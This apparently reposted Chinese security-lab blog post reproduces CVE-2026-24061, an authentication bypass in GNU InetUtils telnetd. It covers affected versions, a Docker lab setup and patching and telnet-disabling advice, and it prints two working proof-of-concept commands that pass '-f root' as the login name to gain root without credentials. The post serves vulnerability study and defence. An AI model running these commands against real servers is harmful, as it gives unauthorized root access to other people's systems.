文章总结： 本文复现GNUInetUtilsTelnetd远程认证绕过漏洞CVE-2026-24061，影响2.7及之前版本。攻击者通过telnet构造USER=-froot参数可触发免认证机制获取root权限。文章提供Docker环境复现步骤及POC，建议升级补丁、禁用Telnet改用SSH或部署检测规则进行防护。 综合评分： 84 文章分类： 漏洞POC,漏洞分析

【成功复现】GNU InetUtils Telnetd远程认证绕过漏洞(CVE-2026-24061)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年1月30日 19:12 陕西

#

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

GNU Inetutils是美国GNU社区的一组常见的网络程序。

GNU Inetutils 2.7及之前版本存在参数注入漏洞，该漏洞源于通过USER环境变量绕过远程身份验证，当攻击者通过telnet客户端使用-a或–login参数，并构造USER=-f root的环境变量时，可触发login的-f免认证机制，从而在无需任何合法凭据的情况下直接以root身份登录系统。

注：Telnet 是一种基于TCP的远程终端访问服务与应用层协议，默认使用23端口，允许用户通过网络在本地主机上远程登录并操作另一台服务器。Telnet采用明文方式传输用户名、口令及会话数据，早期广泛用于类Unix系统的远程管理与设备运维。

0x02影响版本

通过命令确认当前telnet所属包和版本

dpkg -S /usr/sbin/telnetd && telnetd --version

1.9.3 <= GNU InetUtils <= 2.7

0x03漏洞复现

1.docker搭建环境

docker run -d --name telnetd-lab -p 0.0.0.0:2323:23 telnetd-vuln:cve-2026-24061

进入docker查看版本

2.漏洞复现

poc

telnet -l "-f root" 192.168.3.30 2323

telnet -a -l "-f root" 192.168.3.30 2323

3.工具测试

4.自研漏洞流量检测规则，成功检出。

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。

2、 在业务允许的情况下禁用telnet，使用ssh。

3.、若必须使用telnet，可配置 InetUtils 的 telnetd 自定义的login工具不允许使用 -f 参数。

建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://www.gnu.org/software/inetutils/manual/https://github.com/yanxinwu946/CVE-2026-24061--telnetd

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】GNU InetUtils Telnetd远程认证绕过漏洞(CVE-2026-24061)》